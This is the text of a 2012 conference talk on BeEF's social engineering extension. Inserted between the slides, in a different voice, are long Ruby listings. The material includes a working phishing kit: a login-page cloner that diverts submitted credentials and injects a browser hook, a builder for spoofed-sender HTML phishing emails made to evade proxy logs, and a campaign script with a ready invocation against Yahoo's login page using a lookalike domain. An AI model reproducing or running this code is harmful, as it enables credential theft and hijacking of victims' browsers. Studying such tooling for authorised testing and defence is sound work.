I’m the Butcher, would you like some BeEF?

7th Sept 2012 - London
Michele ‘antisnatchor’ Orru
Thomas MacKenzie
Who are we

Michele Orru - The Butcher
Thomas MacKenzie - The Meat
Outline

• A social engineering real story
• BeEF intro
• The new BeEF Social Engineering extension
• Having fun with the RESTful API
Social Engineering

• “Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information.” - Grandfather of all knowledge (Wikipedia).
Our Mission...

• Tasked with gathering as many usernames and passwords as possible in a small amount of time
• Tried calling and pretending to be a person of authority, but awareness of that trick seemed to be higher
So...

• We heard great things about S.E.T. (the Social-Engineer Toolkit)
• Decided to use it to clone the target's login website (but found some bugs and limitations that made it almost unusable)
Mass-Mailer

• With the help of a colleague we then wrote a basic mass-mailer that supported per-recipient personalisation, HTML bodies with pictures, and spoofing of the sender domain (the target's own SMTP server settings let mail claiming to come from their domain straight through :-)
We Won

But the IT admin was like...

• DO NOT CLICK ON THAT LINK

We then said (sending another email)...

• DO CLICK ON THAT LINK

AND... WE WON AGAIN!

But...

• We thought we could do it better and integrate some awesome client-side exploitation whilst we were at it...
Meet BeEF

• Browser Exploitation Framework
• Pioneered by Wade Alcorn in 2005
• Powerful platform for client-side pwnage, XSS post-exploitation and, generally, abuse of the victim browser's security context
• The framework lets the penetration tester select specific modules (in real time) to target each hooked browser, and therefore each context

Meet BeEF

• Demo
Social Eng. extension

• The idea was to have BeEF functionality that can be called via the RESTful API, in order to automate:
  • sending phishing emails using templates
  • cloning web pages and harvesting credentials
  • client-side pwnage

AND... WE DID IT!

Social Eng. extension
BeEF web_cloner

• Clone a web page and serve it from BeEF, then automatically:
  • rewrite the page so that its POST requests (the submitted credentials) are intercepted by BeEF
  • add the BeEF hook to it
  • if the original page can be framed, after the POST is intercepted load the original page in an overlay iframe on top of the hooked clone; otherwise redirect to the original page

BeEF web_cloner

• curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"https://login.yahoo.com/config/login_verify2","mount":"/"}' -X POST "http://<BeEF>/api/seng/clone_page?token=53921d2736116dbd86f8f7f7f10e46f1"

• If you register loginyahoo.com, you can specify a mount point of /config/login_verify2, so the phishing URL will be (almost) the same as the real one
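The three rewrites listed above, plus the post-interception choice between overlay iframe and redirect, as an added example in Ruby (BeEF's own language). This is not BeEF's web_cloner code: the module name, the constructed sample HTML, and the assumption that the hook script is served at /hook.js (BeEF's default path) are all mine, and whether the original can be framed is decided here from the X-Frame-Options and CSP frame-ancestors headers of the original response.

```ruby
require 'uri'

# Added example, not BeEF's own web_cloner code: a minimal model of what the
# cloner does to a fetched login page before serving it, and what it answers
# once the victim submits the form. Assumptions: the hook script lives at
# /hook.js (BeEF's default), the HTML fed in is a page already fetched from
# the target, and "can the page be framed" is decided from the headers that
# fetch returned.
module WebClonerExample
  HOOK_PATH = '/hook.js'

  # 1. Point every <form> at the mount point on the cloning server, so the
  #    POST carrying the credentials arrives here instead of at the real site.
  def self.rewrite_forms(html, mount)
    html.gsub(/<form\b([^>]*)>/i) do
      attrs = Regexp.last_match(1)
      action = /\baction\s*=\s*(["'])[^"']*\1/i
      attrs = attrs =~ action ? attrs.sub(action, "action=\"#{mount}\"") : "#{attrs} action=\"#{mount}\""
      "<form#{attrs}>"
    end
  end

  # 2. Let relative CSS/JS/image URLs resolve against the original site, so the
  #    clone renders identically without re-hosting every asset.
  def self.add_base(html, original_url)
    base = URI.join(original_url, './').to_s
    html.sub(/<head\b[^>]*>/i) { |head| "#{head}<base href=\"#{base}\">" }
  end

  # 3. Hook the browser: from the moment this script runs the page polls the
  #    BeEF server, so modules can be pushed while the victim is still typing.
  def self.inject_hook(html, beef_url)
    html.sub(%r{</body>}i) { "<script src=\"#{beef_url}#{HOOK_PATH}\"></script></body>" }
  end

  def self.clone_page(html, original_url, beef_url, mount)
    inject_hook(add_base(rewrite_forms(html, mount), original_url), beef_url)
  end

  # The intercepted POST body, decoded into the fields worth logging.
  def self.harvest(post_body)
    URI.decode_www_form(post_body).to_h
  end

  # Can the original be shown in an iframe on our domain? X-Frame-Options
  # DENY/SAMEORIGIN, or a CSP frame-ancestors list that does not include '*',
  # means the browser will refuse, so we must redirect instead.
  def self.frameable?(headers)
    h = headers.transform_keys { |k| k.to_s.downcase }
    xfo = h['x-frame-options'].to_s.strip.downcase
    return false if %w[deny sameorigin].include?(xfo)
    csp = h['content-security-policy'].to_s.downcase
    m = csp.match(/frame-ancestors\s+([^;]*)/)
    return false if m && !m[1].include?('*')
    true
  end

  # What the victim sees after submitting: the real page laid over the hooked
  # clone (the hook stays alive underneath) when framing works, otherwise a
  # plain redirect. Returned as a Rack-style [status, headers, body] triple.
  def self.post_response(original_url, frameable)
    if frameable
      overlay = "<iframe src=\"#{original_url}\" style=\"position:fixed;top:0;left:0;" \
                "width:100%;height:100%;border:0;z-index:2147483647\"></iframe>"
      [200, { 'Content-Type' => 'text/html' }, overlay]
    else
      [302, { 'Location' => original_url }, '']
    end
  end
end
```

The overlay branch is the one worth keeping in mind when defending: a login page that sends X-Frame-Options or frame-ancestors forces the attacker into the redirect path, which drops the hooked page and with it the hook. The form rewrite uses regular expressions rather than an HTML parser to stay dependency-free; on pages with unusual markup a real parser is the safer choice.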
BeEF web_cloner

• Demo
BeEF mass_mailer

• Run your phishing email campaigns:
  • get a sample email from your target (with the company footer...)
  • copy its HTML content into a new BeEF email template
  • download the images so they get embedded inline (no remote fetch to give the campaign away)
  • add your malicious links/attachments
  • send the mail to X targets and have fun

BeEF mass_mailer

• email template structure (image)

BeEF mass_mailer

• the ‘default’ template HTML mail (image)

BeEF mass_mailer

• how the ‘default’ template email will look (image)
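What a template like the ‘default’ one turns into on the wire, as an added Ruby example that is not BeEF's own template engine: one HTML message per recipient, personalised from an address => name map, with the logo carried inline as a multipart/related part referenced by Content-ID, and the From header set to whatever domain the relay will accept. The template text, the logo bytes and every address here are constructed for the example.

```ruby
require 'base64'
require 'securerandom'
require 'time'

# Added example, not BeEF's own mass_mailer code: builds the kind of message
# the mass_mailer sends. The From domain only goes through when the relay
# does not verify the sender, which is the situation the story describes.
module PhishMailExample
  # Constructed template; {{name}}, {{link}} and {{linktext}} are filled in
  # per recipient. The logo is referenced by cid: so no remote image is loaded.
  TEMPLATE = <<~HTML
    <html><body>
    <img src="cid:logo" alt="logo"><br>
    <p>Hi {{name}},</p>
    <p>Please <a href="{{link}}">{{linktext}}</a> to keep your mailbox active.</p>
    <p>-- IT Helpdesk</p>
    </body></html>
  HTML

  def self.render(template, vars)
    template.gsub(/\{\{(\w+)\}\}/) { vars.fetch(Regexp.last_match(1)) }
  end

  # Raw RFC 5322 message, the string you would hand to Net::SMTP#send_message.
  def self.build_message(from:, to:, name:, subject:, link:, linktext:, logo_png:)
    boundary = "=_#{SecureRandom.hex(12)}"
    domain = from[/@([\w.-]+)/, 1]
    html = render(TEMPLATE, 'name' => name, 'link' => link, 'linktext' => linktext)
    [
      "From: #{from}",
      "To: #{name} <#{to}>",
      "Subject: #{subject}",
      "Date: #{Time.now.rfc2822}",
      "Message-ID: <#{SecureRandom.uuid}@#{domain}>",
      'MIME-Version: 1.0',
      "Content-Type: multipart/related; boundary=\"#{boundary}\"",
      '',
      "--#{boundary}",
      'Content-Type: text/html; charset=UTF-8',
      'Content-Transfer-Encoding: 8bit',
      '',
      html,
      "--#{boundary}",
      'Content-Type: image/png; name="logo.png"',
      'Content-Transfer-Encoding: base64',
      'Content-ID: <logo>',
      'Content-Disposition: inline; filename="logo.png"',
      '',
      Base64.strict_encode64(logo_png).scan(/.{1,76}/).join("\r\n"),
      "--#{boundary}--",
      ''
    ].join("\r\n")
  end

  # One message per recipient, from the same address => name map the
  # send_mails API takes.
  def self.campaign(recipients, **opts)
    recipients.map { |addr, name| build_message(to: addr, name: name, **opts) }
  end
end
```

Inline images are what make the cloned corporate footer look right in the mail client, and they also avoid the remote image load that would otherwise show up in the target's proxy logs before anyone clicks.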
BeEF mass_mailer

• curl -H "Content-Type: application/json; charset=UTF-8" -d 'body' -X POST "http://<BeEF>/api/seng/send_mails?token=0fda00ea62a1102f"

where body is (note that link is the real href and linktext is what the victim sees):

{
  "template": "default",
  "subject": "Hi from BeEF",
  "fromname": "BeEF",
  "link": "http://www.microsoft.com/",
  "linktext": "http://beefproject.com",
  "recipients": [{
    "user1@gmail.com": "Michele",
    "user2@antisnatchor.com": "Antisnatchor"
  }]
}
BeEF mass_mailer

• Demo
Combine everything FTW

• Register your phishing domain
• Point its A and MX records at a VPS where you run an SMTP server and BeEF
• Write a script against the BeEF RESTful API that:
  • clones the target login page with web_cloner
  • sends X emails containing that link with mass_mailer
  • scripts the follow-up attacks per hooked browser, thanks to BeEF browser detection
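The RESTful API script from the list above, covering the clone_page and send_mails calls shown earlier, as an added Ruby example rather than BeEF's own code. Assumptions: the API token is obtained from POST /api/admin/login (BeEF's REST login endpoint, credentials as in its config.yaml), BeEF listens on the beef_url given, and the phishing domain already resolves to that host. The per-browser follow-up step is left out, since which module to fire depends on the hooked browser and the engagement.

```ruby
require 'json'
require 'net/http'
require 'uri'

# Added example, not BeEF's own code: drives the two seng endpoints from one
# script. Assumptions: BeEF's REST API is reachable at beef_url, the token
# comes from POST /api/admin/login, and the phishing domain points here.
class BeefSengClient
  def initialize(beef_url, token)
    @base = URI(beef_url)
    @token = token
  end

  # Every REST call is a JSON POST with the token in the query string, exactly
  # as the curl one-liners do; built separately so it can be inspected.
  def self.build_request(beef_url, path, payload, token = nil)
    uri = URI.join(beef_url, path)
    uri.query = URI.encode_www_form('token' => token) if token
    req = Net::HTTP::Post.new(uri)
    req['Content-Type'] = 'application/json; charset=UTF-8'
    req.body = JSON.generate(payload)
    req
  end

  def self.login(beef_url, username, password)
    req = build_request(beef_url, '/api/admin/login', { 'username' => username, 'password' => password })
    res = Net::HTTP.start(req.uri.host, req.uri.port) { |http| http.request(req) }
    body = JSON.parse(res.body)
    raise "BeEF login failed: #{res.body}" unless body['success']
    new(beef_url, body['token'])
  end

  # Clone the target login page and serve it at `mount` (use the original path
  # so the phishing URL differs from the real one only in the domain).
  def clone_page(url, mount)
    post('/api/seng/clone_page', { 'url' => url, 'mount' => mount })
  end

  # Payload shape of the send_mails call: `link` is the real href, `linktext`
  # what the victim reads, `recipients` a single address => name map in a list.
  def self.mail_payload(template:, subject:, fromname:, link:, linktext:, recipients:)
    { 'template' => template, 'subject' => subject, 'fromname' => fromname,
      'link' => link, 'linktext' => linktext, 'recipients' => [recipients] }
  end

  def send_mails(**opts)
    post('/api/seng/send_mails', self.class.mail_payload(**opts))
  end

  # The whole campaign: log in, clone, then mail the link. Not invoked here
  # because it needs a live BeEF; call it from your own script.
  def self.run_campaign(beef_url:, username:, password:, target:, mount:, phish_link:, recipients:)
    beef = login(beef_url, username, password)
    beef.clone_page(target, mount)
    beef.send_mails(template: 'default', subject: 'Please verify your mailbox', fromname: 'IT Helpdesk',
                    link: phish_link, linktext: target, recipients: recipients)
  end

  private

  def post(path, payload)
    req = self.class.build_request(@base.to_s, path, payload, @token)
    res = Net::HTTP.start(@base.host, @base.port) { |http| http.request(req) }
    JSON.parse(res.body)
  end
end
```

A typical invocation is BeefSengClient.run_campaign(beef_url: 'http://127.0.0.1:3000', username: 'beef', password: '...', target: 'https://login.yahoo.com/config/login_verify2', mount: '/config/login_verify2', phish_link: 'http://loginyahoo.com/config/login_verify2', recipients: { 'user1@example.com' => 'Michele' }). Keep the REST interface bound to localhost or a management network: whoever holds the token can clone pages and send mail in your name.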
Combine everything FTW

• Last demo

BeEF web_cloner + mass_mailer + RESTful API = (image)
Thanks

• Wade, for always being awesome
• The other BeEF guys: Brendan, Christian, Ben, Saafan, Ryan, Heather
• A few new project joiners: Bart Leppens, gallypette, Quentin Swain
• Tom Neaves for the butcher/hook images :D

Questions?